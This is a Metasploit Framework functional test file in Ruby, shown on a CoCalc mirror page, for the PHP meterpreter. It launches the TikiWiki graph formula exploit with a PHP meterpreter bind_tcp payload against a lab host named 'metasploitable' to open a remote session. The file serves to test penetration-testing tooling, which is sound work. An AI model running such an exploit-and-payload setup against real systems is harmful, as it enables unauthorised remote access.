CoCalc -- meterpreter_php

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/test/functional/meterpreter/meterpreter_php_spec.rb
Views: ¹⁹⁰⁴

1
$:.unshift(File.join(File.dirname(__FILE__)))
2
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
3
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'test', 'lib'))
4

5
require 'fileutils'
6
require 'meterpreter_spec_helper'
7
require 'meterpreter_specs'
8

9
module MsfTest
10
  describe "PhpMeterpreter" do
11
    # This include brings in all the spec helper methods
12
    include MsfTest::MeterpreterSpecHelper
13

14
    # This include brings in all the specs that are generic across the
15
    # meterpreter platforms
16
    include MsfTest::MeterpreterSpecs
17

18
    before :all do
19
      @verbose = true
20

21
      @meterpreter_type = "php"
22

23
      ## Set up an outupt directory
24
      @output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
25

26
      if File.directory? @output_directory
27
        FileUtils.rm_rf(@output_directory)
28
      end
29

30
      Dir.mkdir(@output_directory)
31
      @default_file = "#{@output_directory}/default"
32

33
      create_session_php
34
    end
35

36
    before :each do
37
    end
38

39
    after :each do
40
      @session.init_ui(@input, @output)
41
    end
42

43
    after :all do
44
      FileUtils.rm_rf(@output_directory)
45
    end
46

47
    def create_session_php
48
      ## Setup for php
49
      @framework = Msf::Simple::Framework.create
50

51
      @exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
52
      @payload_name = 'php/meterpreter/bind_tcp'
53
      @input = Rex::Ui::Text::Input::Stdio.new
54
      @output = Rex::Ui::Text::Output::File.new(@default_file)
55

56
      # Initialize the exploit instance
57
      exploit = @framework.exploits.create(@exploit_name)
58

59
      ## Fire it off against a known-vulnerable host
60
      @session = exploit.exploit_simple(
61
        'Options' => { 'RHOST' => "metasploitable" },
62
        'Payload' => @payload_name,
63
        'LocalInput' => @input,
64
        'LocalOutput' => @output
65
      )
66

67
      puts @session.inspect
68

69
      ## If a session came back, try to interact with it.
70
      if @session
71
        @session.load_stdapi
72
      else
73
        raise Exception "Couldn't get a session!"
74
      end
75
    end
76
  end
77
end
78

79

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Product

Resources

Company